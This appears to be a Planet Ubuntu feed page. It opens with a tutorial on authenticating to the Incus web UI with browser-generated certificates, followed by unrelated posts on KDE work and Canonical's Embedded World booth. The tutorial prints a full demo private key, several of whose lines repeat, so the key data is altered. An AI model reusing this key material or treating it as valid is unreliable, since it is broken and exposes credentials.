<p>Visit the URL of your Incus server with your browser. At first you will likely confronted with a message that the server certificate is not accepted (<em>Warning: Potential Security Risk Ahead</em>). Click to <em>Accept</em> and continue. Then, you are presented with the following screen that asks you to login. You are authenticated to the Incus server through <em>user certificates</em>. You are prompted here to do just that. Your browser will create </p>
<ol>
<li>a user certificate to be installed into Incus (<code>incus-ui.crt</code>)</li>
<li>the same user certificate with a private key that will be setup in your browser(s) (<code>incus-ui.pfx</code>).</li>
</ol>
<p>Click on <strong><em>Create a new certificate</em></strong>.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-1.png?ssl=1"><img alt="" class="wp-image-46763" height="485" src="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-1.png?resize=750%2C485&ssl=1" width="750" /></a>Creating a new certificate.</figure></div>
<p>Now click on <strong><em>Generate</em></strong> to get your browser to generate the private key and the certificate. </p>
<figure class="wp-block-image size-large"><a href="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-2.png?ssl=1"><img alt="" class="wp-image-46766" height="641" src="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-2.png?resize=750%2C641&ssl=1" width="750" /></a></figure>
<p></p>
<p>You are asked whether you want to protect the certificate with a password. In our case we click on <strong><em>Skip</em></strong> because we do not want to encrypt the private key with a password. By clicking on <strong><em>Skip</em></strong>, the private key is still generated but it is not getting encrypted.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-3.png?ssl=1"><img alt="" class="wp-image-46767" height="446" src="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-3.png?resize=626%2C446&ssl=1" width="626" /></a></figure></div>
<p>At this point the browser generated <code>incus-ui.crt</code>, which is the user certificate to install in Incus. In the following we added the user certificate to Incus.</p>
<pre class="wp-block-code"><code>debian@myincus:~$ <kbd>incus config trust list</kbd>
+------+------+-------------+-------------+-------------+
| NAME | TYPE | DESCRIPTION | FINGERPRINT | EXPIRY DATE |
+------+------+-------------+-------------+-------------+
debian@myincus:~$ <kbd>incus config trust add-certificate incus-ui.crt</kbd>
debian@myincus:~$ <kbd>incus config trust list</kbd>
+--------------+--------+-------------+--------------+----------------------+
| NAME | TYPE | DESCRIPTION | FINGERPRINT | EXPIRY DATE |
+--------------+--------+-------------+--------------+----------------------+
| incus-ui.crt | client | | b89b80eb4c89 | 2026/12/23 21:08 UTC |
+--------------+--------+-------------+--------------+----------------------+
debian@myincus:~$ </code></pre>
<div class="wp-block-image">
<figure class="aligncenter size-large"><a href="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-4.png?ssl=1"><img alt="" class="wp-image-46768" height="641" src="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-4.png?resize=750%2C641&ssl=1" width="750" /></a>The two files have been generated. We are adding <code>incus-ui.crt</code> to Incus, and <code>incus-ui.pfx</code> to the Web browser. </figure></div>
<p>The page above has instructions on how to add the user certificate to Firefox, Chrome, Edge and macOS. For example, for the case of Firefox, type the following to the address bar and press Enter. Alternatively, go to Settings→Privacy & Security→Certificates. There, click on <strong><em>View Certificates…</em></strong> and select the <strong><em>Your Certificates</em></strong> tab. Finally, click to Import… the <code>incus-ui.pfx</code> certificate file.</p>
<pre class="wp-block-code"><code>about:preferences#privacy</code></pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-5.png?ssl=1"><img alt="" class="wp-image-46769" height="175" src="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-5.png?resize=750%2C175&ssl=1" width="750" /></a>This is found in Firefox under <strong><em>Settings</em></strong>→<strong><em>Privacy & Security</em></strong>→<strong><em>Certificates</em></strong>.</figure></div>
<p>When you add the <code>incus-ui.pfx</code> user certificate in Firefox, it will appear as in the following screenshot.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-6.png?ssl=1"><img alt="" class="wp-image-46770" height="482" src="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-6.png?resize=705%2C482&ssl=1" width="705" /></a>The <code>incus-ui.pfx</code> certificate has been added to this instance of Firefox.</figure></div>
<p>Subsequently, switch back to the Firefox tab with the Incus UI page and you are shown the following prompt to get your browser to send the user certificate to the Incus manager in order to get authenticated, and be able to manage Incus through the Web. Click on <strong><em>OK</em></strong>.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><a href="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-7.png?ssl=1"><img alt="" class="wp-image-46771" height="311" src="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-7.png?resize=750%2C311&ssl=1" width="750" /></a>You are prompted to identify yourself to Incus UI in order to be able to manage the Incus installation.</figure></div>
<p>Finally, you are able to manage Incus over the Web with Incus UI. The Web page loads up and you can perform all tasks that you can do with the <code>incus</code> command-line client.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-8.png?ssl=1"><img alt="" class="wp-image-46772" height="584" src="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-8.png?resize=750%2C584&ssl=1" width="750" /></a>Your browser is now authenticated through your user certificate and you can manage Incus over the Web with Incus UI.</figure></div>
<h2 class="wp-block-heading" id="using-the-incus-ui">Using the Incus UI</h2>
<p>We click on <strong><em>Create Instance</em></strong> to create a first instance. We select from the list which image to use, then click to <strong><em>Create and start</em></strong>.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><a href="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-9.png?ssl=1"><img alt="" class="wp-image-46774" height="454" src="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-9.png?resize=750%2C454&ssl=1" width="750" /></a>Creating an instance and starting it.</figure></div>
<p>While the instance is created, you are updated with the different steps that take place. In the end, the instance is successfully launched.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><a href="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/Screenshot-2024-03-28-at-23-52-55-10.10.10.98-Incus-UI.png?ssl=1"><img alt="" class="wp-image-46776" height="454" src="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/Screenshot-2024-03-28-at-23-52-55-10.10.10.98-Incus-UI.png?resize=750%2C454&ssl=1" width="750" /></a>The instance has been created and is running.</figure></div>
<h2 class="wp-block-heading" id="conclusion">Conclusion</h2>
<p>With Incus UI you are able to go through all the workflow of managing Incus instances through your Web browser. Incus UI has been implemented as a stateless Web application, which means that no information are stored on the browser. For example, the browser does not maintain a database with the created instances; the state is maintained on Incus.</p>
<p>There are a few more UI Web applications for Incus, including <code><a href="https://github.com/melato/lxops">lxops</a></code>. At some point in the future I expect to cover them as well.</p>
<h2 class="wp-block-heading" id="tips-and-tricks">Tips and Tricks</h2>
<h3 class="wp-block-heading" id="how-to-make-the-incus-port-accessible-to-localhost-only">How to make the Incus port accessible to localhost only</h3>
<p>The address has the format of <<em>ip address</em>>:<<em>port</em>>. You can specify <em>localhost</em> (127.0.0.1) for the part of the IP address. By doing so, Incus will only bind to <em>localhost</em> and listen to local connections only.</p>
<pre class="wp-block-code"><code>debian@myincus:~$ <kbd>incus config show</kbd>
config:
core.https_address: :8443
debian@myincus:~$ <kbd>incus config set core.https_address 127.0.0.1:8443</kbd>
debian@myincus:~$ <kbd>incus config show</kbd>
config:
core.https_address: 127.0.0.1:8443
debian@myincus:~$ <kbd>sudo lsof -i :8443</kbd>
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
incusd 8338 root 8u IPv4 30315 0t0 TCP localhost:8443 (LISTEN)
debian@myincus:~$ </code></pre>
<h3 class="wp-block-heading" id="whats-in-incusuicrt-and-incusuipfx">What’s in <code>incus-ui.crt</code> and <code>incus-ui.pfx</code>?</h3>
<p>You can use <code>openssl</code> to decode both files. This is an RSA 2048-bit certificate using the SHA-1 hash function.</p>
<pre class="wp-block-code"><code>$ <kbd>openssl x509 -in incus-ui.crt -noout -text</kbd>
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
01:12:00:11:07:65:00:03:00:10:00:41:00:04:09:11
Signature Algorithm: sha1WithRSAEncryption
Issuer: C = AU, ST = Some-State, O = Incus UI 10.10.10.98 (Browser Generated)
Validity
Not Before: Mar 28 21:08:58 2024 GMT
Not After : Dec 23 21:08:58 2026 GMT
Subject: C = AU, ST = Some-State, O = Incus UI 10.10.10.98 (Browser Generated)
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
00:ce:f8:1d:67:e1:a3:f5:1a:16:b6:26:63:8f:32:
42:99:0d:af:86:8b:18:49:1a:4b:8e:ab:68:e1:04:
ba:24:dd:e6:27:d5:df:7a:13:cf:16:b3:33:28:89:
e0:ab:c8:dc:c1:2a:0a:de:ed:26:3a:77:74:dd:42:
1c:e2:22:fc:a5:a5:68:c1:c9:3b:4d:12:15:27:ae:
c6:50:ec:dc:f1:0a:ba:00:0c:83:d0:0d:0f:81:90:
4e:30:43:cb:45:bf:e2:e9:17:39:40:3b:95:8b:8b:
18:e9:59:51:fc:9a:7a:80:e4:73:b3:54:bd:ff:1c:
7c:81:75:16:e3:6f:3a:56:9b:0f:a3:73:55:45:03:
d8:fb:f3:34:4c:60:4f:f2:67:9f:66:ea:29:29:78:
6c:66:05:d6:7d:96:cd:0f:2b:4b:9c:71:2c:09:6f:
e2:b4:23:d0:5d:d0:fe:b0:6a:b1:58:5e:d7:b5:47:
9e:aa:47:34:f8:7d:e1:ed:fe:bf:97:3d:99:49:42:
af:e2:e5:b3:c5:1e:58:b1:98:01:db:8f:25:9f:f8:
d9:03:02:06:f9:99:0a:3a:a1:70:9d:fe:64:0d:c2:
d8:cc:f0:1c:53:e4:31:4c:78:12:c2:fd:72:23:6a:
f4:7e:41:f9:d5:df:6b:ad:2c:52:29:d0:7f:eb:65:
64:0f
Exponent: 65537 (0x10001)
Signature Algorithm: sha1WithRSAEncryption
Signature Value:
28:b3:5c:48:64:8c:23:82:dd:e2:05:6a:9d:18:dd:43:f4:07:
e6:be:1e:80:b7:f9:0c:0f:3d:cd:b8:bd:7b:55:7e:36:6d:74:
24:d5:69:b2:24:51:3a:2d:c5:95:68:b5:dc:27:d5:83:d9:bc:
cb:d0:fd:55:24:63:7d:c6:65:9b:f1:b3:9d:f7:b4:4e:ba:83:
eb:bf:f5:d0:f6:95:2d:7b:90:4e:d3:89:ac:f0:87:e6:fa:9d:
f6:ea:c2:42:f2:15:17:74:5c:e4:3c:ed:1a:42:3c:e7:04:aa:
65:42:3e:75:5c:24:8e:52:85:0d:4b:b2:e2:ec:fa:57:4a:68:
35:4b:8f:3c:13:fc:15:09:80:5a:b1:c8:e0:22:f5:69:25:4b:
46:8b:e0:b9:e1:3a:f5:0c:40:d2:c3:75:9c:79:9a:aa:68:9b:
21:36:ed:67:cb:6d:fc:bc:f0:0b:5a:2b:1a:4c:73:67:c5:79:
b6:27:b9:58:d0:c7:ea:84:21:bf:f4:7c:44:11:d7:88:ab:1d:
e4:53:c9:10:cd:e6:b8:5a:7a:92:73:a8:1e:fe:1c:2e:dc:e8:
7e:3d:e9:a2:6d:26:5a:09:40:a1:3e:51:40:8b:da:57:37:9a:
8d:0e:d8:cf:c1:0a:b1:0b:95:53:05:41:29:39:af:93:9b:aa:
10:af:a1:6c
$ </code></pre>
<p>For the <code>incus-ui.pfx</code> file, we first convert to the PEM format, then print the contents. The PFX file contains the certificate (the same that was added earlier to Incus) along with the private key.</p>
<pre class="wp-block-code"><code>$ <kbd>openssl pkcs12 -in incus-ui.pfx -out incus-ui.pem -noenc</kbd>
Enter Import Password:
$ <kbd>cat incus-ui.pem </kbd>
Bag Attributes
localKeyID: 3A 23 25 F7 56 4D 71 B8 FB FD 72 90 2D A1 F3 B8 2F 01 5E 92
friendlyName: Incus-UI
subject=C = AU, ST = Some-State, O = Incus UI 10.10.10.98 (Browser Generated)
issuer=C = AU, ST = Some-State, O = Incus UI 10.10.10.98 (Browser Generated)
-----BEGIN CERTIFICATE-----
MIIDMjCCAhqgAwIBAgIQARIAEQdlAAMAEABBAAQJETANBgkqhkiG9w0BAQUFADBV
MQswCQYDVQQGEwJBVTETMBEGA1UECBMKU29tZS1TdGF0ZTExMC8GA1UEChMoSW5j
dXMgVUkgMTAuMTAuMTAuOTggKEJyb3dzZXIgR2VuZXJhdGVkKTAeFw0yNDAzMjgy
MTA4NThaFw0yNjEyMjMyMTA4NThaMFUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIEwpT
b21lLVN0YXRlMTEwLwYDVQQKEyhJbmN1cyBVSSAxMC4xMC4xMC45OCAoQnJvd3Nl
ciBHZW5lcmF0ZWQpMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzvgd
Z+Gj9RoWtiZjjzJCmQ2vhosYSRpLjqto4QS6JN3mJ9XfehPPFrMzKIngq8jcwSoK
3u0mOnd03UIc4iL8paVowck7TRIVJ67GUOzc8Qq6AAyD0A0PgZBOMEPLRb/i6Rc5
QDuVi4sY6VlR/Jp6gORzs1S9/xx8gXUW4286VpsPo3NVRQPY+/M0TGBP8mefZuop
KXhsZgXWfZbNDytLnHEsCW/itCPQXdD+sGqxWF7XtUeeqkc0+H3h7f6/lz2ZSUKv
4uWzxR5YsZgB248ln/jZAwIG+ZkKOqFwnf5kDcLYzPAcU+QxTHgSwv1yI2r0fkH5
1d9rrSxSKdB/62VkDwIDAQABMA0GCSqGSIb3DQEBBQUAA4IBAQAos1xIZIwjgt3i
BWqdGN1D9Afmvh6At/kMDz3NuL17VX42bXQk1WmyJFE6LcWVaLXcJ9WD2bzL0P1V
JGN9xmWb8bOd97ROuoPrv/XQ9pUte5BO04ms8Ifm+p326sJC8hUXdFzkPO0aQjzn
BKplQj51XCSOUoUNS7Li7PpXSmg1S488E/wVCYBascjgIvVpJUtGi+C54Tr1DEDS
w3WceZqqaJshNu1ny238vPALWisaTHNnxXm2J7lY0MfqhCG/9HxEEdeIqx3kU8kQ
zea4WnqSc6ge/hwu3Oh+PemibSZaCUChPlFAi9pXN5qNDtjPwQqxC5VTBUEpOa+T
m6oQr6Fs
-----END CERTIFICATE-----
Bag Attributes
localKeyID: 3A 23 25 F7 56 4D 71 B8 FB FD 72 90 2D A1 F3 B8 2F 01 5E 92
friendlyName: Incus-UI
Key Attributes: <No Attributes>
-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDO+B1n4aP1Gha2
JmOPMkKZDa+GixhJGkuOq2jhBLok3eYn1d96E88WszMoieCryNzBKgre7SY6d3Td
QhziIvylpWjByTtNEhUnrsZQ7NzxCroADIPQDQ+BkE4wQ8tFv+LpFzlAO5WLixjp
WVH8mnqA5HOzVL3/HHyBdRbjbzpWmw+jc1VFA9j78zRMYE/yZ59m6ikpeGxmBdZ9
ls0PK0uccSwJb+K0I9Bd0P6warFYXte1R56qRzT4feHt/r+XPZlJQq/i5bPFHlix
mAHbjyWf+NkDAgb5mQo6oXCd/mQNwtjM8BxT5DFMeBLC/XIjavR+QfnV32utLFIp
0H/rZWQPAgMBAAECggEBAMm1N/tpBgC291F4YmlJg2xk0R8f6oA8V0zpMyKyF7Qc
atWB8/Wm3pnx9bbZgRQKg1LiZYvTtgEfMM7+QuYFURMi/NB4DQpUyDdPd0mhPsbQ
WVH8mnqA5HOzVL3/HHyBdRbjbzpWmw+jc1VFA9j78zRMYE/yZ59m6ikpeGxmBdZ9
+uKyZ4U4/TORu2tadg9frtUl1HhkY1zGAxOyJUbCOVIbZF2iQt5zMZt4XLFhKgwh
jtDklc3dFIDigUZzpMgdLExLWi6CGT++cjJGpseM+QOAubSoCmT6eIs8qi9KpQhk
aZYBerWqBxswkmNGK4Zh+5gFvdW7EmEp128hATgYZGECgYEA7ckh3qL4Jg6FQA8+
UeEoaT2CvDI89HMJfFN2NvU1ZklqP9aDnPvMjui/h/8HtDeb+5FWFZHF1B9laJp3
HnGGt+98/aO9skdFQDiszclDNIHdpSqcD2LWkKz84QTWqTTkRAxJpgnW91oURtyh
WVH8mnqA5HOzVL3/HHyBdRbjbzpWmw+jc1VFA9j78zRMYE/yZ59m6ikpeGxmBdZ9
JSltWZtYemYzPTpZysocyRs5mD8CgYEA3tKviDreIR+TKT3FQoevyicXuwSn6ocH
2RTgJQF+Qyj+1ykQhwRQUD+axZGls5g2JgT+2gFIdUcAR9CN22rxLRbnIj645yGP
Ka4dVhNAZnz/olWgs4onoO0CnOGXAkVdyiBe9H/D1dkj5bqAfY1eov6khPMOyrDF
EXGi0e6uInbddI/sHUAAIIqJ4+knqwJIgxlzA9GFuzzt4oRLGMsoaClLYFCsrekJ
SF/w7DvhoDQo+JIrHuGX4hLgFLWOgp2WMWhbvgZ0P1PWcJukZ/jx7rJmkwKBgGa5
7x75NMtEiU3sInMnpw2ltDUOUnO3SRD1pNiqtZE05zg+wFXe0UAN8sa+/QutUtl4
WVH8mnqA5HOzVL3/HHyBdRbjbzpWmw+jc1VFA9j78zRMYE/yZ59m6ikpeGxmBdZ9
WB4dlVAsKZ7yMVRFG2dUNb7997TnLd9jXDcArSIS4q/uliXvvZFdc2TsQ/hSDolP
HzfNZ3XBo+EXeIFpmYW/rA13GQytLl5oDC28WaEhAoGBAL6acBqMflXUoWWVHZR7
0vNcJjtRTC13SGRoAKR/tT2kUqloz60bgWeVtggkFWTpPGgm6lmSuYvTnPeoHYDf
vLibVFGasTk8Y7Aji0V7rF4O
-----END PRIVATE KEY-----
$ </code></pre>
<h2 class="wp-block-heading" id="troubleshooting">Troubleshooting</h2>
<h3 class="wp-block-heading" id="error-unable-to-connect">Error: Unable to connect</h3>
<p>You tried to access the IP address of the Incus server as (for example) <code>https://192.168.1.10/</code> while you should have specified the IP address as well. The URL should look like <code>https://192.168.1.10:8443/</code>.</p>
<h3 class="wp-block-heading" id="error-client-sent-an-http-request-to-an-https-server">Error: Client sent an HTTP request to an HTTPS server</h3>
<p>You tried to connect to the Incus server at an address (for example) <code>http://192.168.1.10:8443/</code> but you omitted the <code>s</code> in <code>https</code>. Use <code>https://192.168.1.10:8443/</code> instead. </p>
<h3 class="wp-block-heading" id="warning-potential-security-risk-ahead">Warning: Potential Security Risk Ahead</h3>
<p>You are accessing the Incus server through the HTTPS address for the first time and the certificate has not been signed by a certification authority. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image.png?ssl=1"><img alt="" class="wp-image-46761" height="540" src="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image.png?resize=750%2C540&ssl=1" width="750" /></a>First attempt to access the Incus server over HTTPS with your browser.</figure></div>
<p>Click on <em>Advanced</em> and select to <em>Accept the risk and Continue</em>. If you want to avoid this error message, you need to provide a server certificate that is accepted by your browser. </p>
<div class="saboxplugin-wrap"><div class="saboxplugin-tab"><div class="saboxplugin-gravatar"><img alt="Simos Xenitellis" class="avatar avatar-100 photo" height="100" src="https://secure.gravatar.com/avatar/5c04c6b5f513d926ea9d77782a3843a1?s=100&d=wavatar&r=g" width="100" /></div><div class="saboxplugin-authorname"><a class="vcard author" href="https://blog.simos.info/author/simos/" rel="author"><span class="fn">Simos Xenitellis</span></a></div><div class="saboxplugin-desc"><div></div></div><div class="saboxplugin-web "><a href="https://blog.simos.info/" target="_self">blog.simos.info/</a></div><div class="clearfix"></div></div></div>Ubuntu developershttp://planet.ubuntu.com/Purism Differentiator Series, Part 8: Big Tech Avoidancehttps://puri.sm/?p=811832024-03-28T18:14:24+00:00<p>Welcome to Purism, a different type of technology company. We believe you should have technology that does not spy on you. We believe you should have complete control over your digital life. We advocate for personal privacy, cyber security, and individual freedoms. We sell hardware, develop software, and provide services according to these beliefs. To […]</p>
<p>The post <a href="https://puri.sm/posts/purism-differentiator-series-part-8-big-tech-avoidance/" rel="nofollow">Purism Differentiator Series, Part 8: Big Tech Avoidance</a> appeared first on <a href="https://puri.sm/" rel="nofollow">Purism</a>.</p>Todd Weaverhttps://puri.sm/Scarlett Gately Moore: Kubuntu, KDE Report. In Loving Memory of my Son.https://www.scarlettgatelymoore.dev/?p=4312024-03-28T17:54:44+00:00<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">
</div></figure>
<p><strong>Personal:</strong></p>
<p>As many of you know, I lost my beloved son March 9th. This has hit me really hard, but I am staying strong and holding on to all the wonderful memories I have. He grew up to be an amazing man, devoted christian and wonderful father. He was loved by everyone who knew him and will be truly missed by us all. I have had folks ask me how they can help. He left behind his 7 year old son Mason. Mason was Billy’s world and I would like to make sure Mason is taken care of. I have set up a gofundme for Mason and all proceeds will go to the future care of him. </p>
<p><a href="https://gofund.me/25dbff0c">https://gofund.me/25dbff0c</a></p>
<p class="has-text-align-center"><strong>Work report</strong></p>
<p><strong>Kubuntu:</strong></p>
<p>Bug bashing! I am triaging allthebugs for Plasma which can be seen here:</p>
<p><a href="https://bugs.launchpad.net/plasma-5.27/+bug/2053125">https://bugs.launchpad.net/plasma-5.27/+bug/2053125</a></p>
<p>I am happy to report many of the remaining bugs have been fixed in the latest bug fix release 5.27.11.</p>
<p>I prepared <a href="https://kde.org/announcements/plasma/5/5.27.11/">https://kde.org/announcements/plasma/5/5.27.11/</a> and Rik uploaded to archive, thank you. Unfortunately, this and several other key fixes are stuck in transition do to the time_t64 transition, which you can read about here: <a href="https://wiki.debian.org/ReleaseGoals/64bit-time">https://wiki.debian.org/ReleaseGoals/64bit-time</a> . It is the biggest transition in Debian/Ubuntu history and it couldn’t come at a worst time. We are aware our ISO installer is currently broken, calamares is one of those things stuck in this transition. There is a workaround in the comments of the bug report: <a href="https://bugs.launchpad.net/ubuntu/+source/calamares/+bug/2054795">https://bugs.launchpad.net/ubuntu/+source/calamares/+bug/2054795</a></p>
<p>Fixed an issue with plasma-welcome.</p>
<p>Found the fix for emojis and Aaron has kindly moved this forward with the fontconfig maintainer. Thanks!</p>
<p>I have received an <a href="https://kfocus.org/spec/spec-ir14.html">https://kfocus.org/spec/spec-ir14.html</a> laptop and it is truly a great machine and is now my daily driver. A big thank you to the Kfocus team! I can’t wait to show it off at <a href="https://linuxfestnorthwest.org/">https://linuxfestnorthwest.org/</a>.</p>
<p><strong>KDE Snaps:</strong></p>
<p>You will see the activity in this ramp back up as the KDEneon Core project is finally a go! I will participate in the project with part time status and get everyone in the Enokia team up to speed with my snap knowledge, help prepare the qt6/kf6 transition, package plasma, and most importantly I will focus on documentation for future contributors.</p>
<p>I have created the ( now split ) qt6 with KDE patchset support and KDE frameworks 6 SDK and runtime snaps. I have made the kde-neon-6 extension and the PR is in: https://github.com/canonical/snapcraft/pull/4698 . Future work on the extension will include multiple versions track support and core24 support.</p>
<figure class="wp-block-image size-large"><img alt="" class="has-transparency wp-image-433" height="712" src="https://www.scarlettgatelymoore.dev/wp-content/uploads/ark_qt6_snap-1024x712.png" width="1024" /></figure>
<p>I have successfully created our first qt6/kf6 snap ark. They will show showing up in the store once all the required bits have been merged and published.</p>
<p>Thank you for stopping by.</p>
<p>~Scarlett</p>Ubuntu developershttp://planet.ubuntu.com/Ubuntu Blog: Meet Canonical at Embedded World 2024https://ubuntu.com//blog/meet-canonical-at-embedded-world-20242024-03-28T17:07:16+00:00<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" height="628" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1200,h_628/https://ubuntu.com/wp-content/uploads/cd1f/image-2.png" width="1200" />
</noscript>
</div>
</figure>
<p><a href="https://www.embedded-world.de/en">Embedded World</a> is almost here. With 930+ exhibitors, 200 nonstop hours of knowledge sharing, and an exciting <a href="https://www.embedded-world.de/en/conferences-programme/programme-overview">programme</a> structured along 9 tracks with 60+ sessions and 18 classes, Embedded World is the must-attend global event for the embedded community.</p>
<p>Join us at Booth 4-354 in Hall 4 to find out how Canonical, the publisher of Ubuntu, can support your technology stack from cloud to device with unrivalled security. Meet the Canonical team on-site to pick our technical experts’ brains about your embedded Linux business. </p>
<p> <a class="p-button--small p-button--positive" href="https://calendly.com/canonical-embedded-world-2024/embedded-world-live-demo" rel="noreferrer noopener" target="_blank">Book a meeting with our experts</a></p>
<h1 class="wp-block-heading">Raising the bar for embedded Linux with Ubuntu Core 24</h1>
<p>At Canonical we are committed to supporting device manufacturers and IoT pioneers across their deployment journeys by providing a best-in-class experience for embedded Linux in production with Ubuntu Core. </p>
<p>Building on 20 years of innovation within Canonical, Ubuntu Core is a proven embedded Linux OS for Internet of Things (IoT), devices and edge systems. At Embedded World, you’ll connect with manufacturers engaging in large-scale, mass-deployments of Linux boards. Those innovators are pushing the envelope of digital infrastructure with the help of <a href="https://ubuntu.com/core">Ubuntu Core</a>, the most popular Linux-based operating system (OS) purposefully designed for the embedded world. By relying on an enterprise-grade Linux distribution supported over 10+ years, they empower their enterprise customers to focus on what drives their business, shortening time-to-market.</p>
<p>Meet our experts at Booth 4-354 in Hall 4 to learn about Ubuntu Core 24, see industry demos, and hear customer stories about running Ubuntu Core. In this release, Core 24 leaps forward in production build and installation, fleet management, graphics operations and cloud integration. </p>
<h1 class="wp-block-heading">What to expect at our booth</h1>
<p>At Embedded World, we will also showcase how we are setting the stage for the future of digitisation in manufacturing and accelerating industrial transformation. We’re eagerly looking forward to presenting our automotive and IoT offerings, showing you how you can integrate security into your technology stack from cloud to device. </p>
<p>In our booth you’ll find demos spotlighting how our customers and partners are using Ubuntu in their devices. Read more about our demos below:</p>
<h2 class="wp-block-heading">Meet the Husarion Panther </h2>
<p>Since its inception in 2013, <a href="https://husarion.com/">Husarion</a> has been pioneering the commercialization of ROS in the robotics industry. As an autonomous mobile robot (AMR) manufacturer and innovator, Husarion’s commitment lies in making robotics efficient and accessible for all.</p>
<p><a href="https://store.husarion.com/products/panther">Panther</a> is Husarion’s new professional-grade AMR. Engineered for robustness, with independent BLDC motors for each of its four wheels, Panther is a testament to adaptability – flourishing in diverse landscapes from agriculture to construction.</p>
<p>With their decision to use Ubuntu Core, Husarion has upgraded their software deployment for AMR. Snaps provide a solution for consistent software deployment on robots, by bundling ROS applications with their necessary dependencies.</p>
<p> <a class="p-button--small p-button--positive" href="https://calendly.com/canonical-embedded-world-2024/embedded-world-live-demo" rel="noreferrer noopener" target="_blank">Book a demo with the Husarion team to learn more</a></p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" height="472" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1288,h_472/https://ubuntu.com/wp-content/uploads/fbd8/image-1.png" width="1288" />
</noscript>
</div>
</figure>
<h2 class="wp-block-heading">Discover EV charging infrastructure with DFI</h2>
<p>Together with our partners DFI we are presenting our EV charging station solution. DFI is a global leading provider of high-performance computing technology across multiple embedded industries. With its innovative design and premium quality management system, DFI’s industrial-grade solutions enable customers to optimize their equipment and ensure high reliability, long-term life cycle, and 24/7 durability in a breadth of markets including factory automation, medical, gaming, transportation, smart energy, mission-critical, and intelligent retail.</p>
<p>Their EV charging solution is based on x86 architecture, running on Intel’s Virtualization of Graphic Card (SR-IOV) and Intel Neural Mistral 7B AI model, leveraging advanced connectivity (TSN) and Out-Of-Band Management from the Intel technologies. </p>
<p> <a class="p-button--small p-button--positive" href="https://calendly.com/canonical-embedded-world-2024/embedded-world-live-demo" rel="noreferrer noopener" target="_blank">Book a demo to learn more</a></p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" height="900" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1600,h_900/https://ubuntu.com/wp-content/uploads/6d85/image.png" width="1600" />
</noscript>
</div>
</figure>
<h2 class="wp-block-heading">Introducing security devices from Bosch</h2>
<p>At our booth you will find the <a href="https://www.bosch-smarthome.com/uk/en/products/devices/eyes-outdoor-camera-ii/">Bosch Eyes indoor and outdoor security cameras</a>. Part of the Bosch Smart Home ecosystem, these camera’s marry award-winning design with technical excellence built with security in mind using Ubuntu Core. </p>
<p>The second generation Bosch Eyes Outdoor camera comes with person detection, real-time notifications and an integrated alarm system. Its DualRadar technology with two cutting-edge radar sensors enables the camera to detect movements with an exceptionally wide 180° detection range. It can also determine exactly how far away the suspicious movement occurred as well as the exact direction – for twice the security.</p>
<p> <a class="p-button--small p-button--positive" href="https://calendly.com/canonical-embedded-world-2024/embedded-world-live-demo" rel="noreferrer noopener" target="_blank">Book a demo to find out more</a></p>
<h1 class="wp-block-heading">Experience innovation first-hand</h1>
<p>At this year’s Embedded World we are showcasing our world-leading ecosystem of partners. Canonical partners with silicon vendors, board manufacturers and ODMs to shorten enterprises’ time-to-market. At the Canonical booth you will find demo boards which are optimised/certified on Ubuntu from AMD, Ampere, Intel, MediaTek, NVIDIA, Qualcomm, Advantech, Aaeon, Adlink, DFI, IEI, ASRock, and Eurotech. Come and ask us about certified hardware on our booth or our partners booths!</p>
<h2 class="wp-block-heading">Ubuntu Core – the operating system for embedded devices</h2>
<p>Our devices field engineering team will be showcasing a set of applications running on Ubuntu Core.</p>
<p>These demos run on multiple platforms which are all enabled and optimised for Ubuntu Core such as: Intel NUC, MediaTek Genio1200, AMD Kria KV260, Raspberry Pi and even the RISC-V Si-Five board.</p>
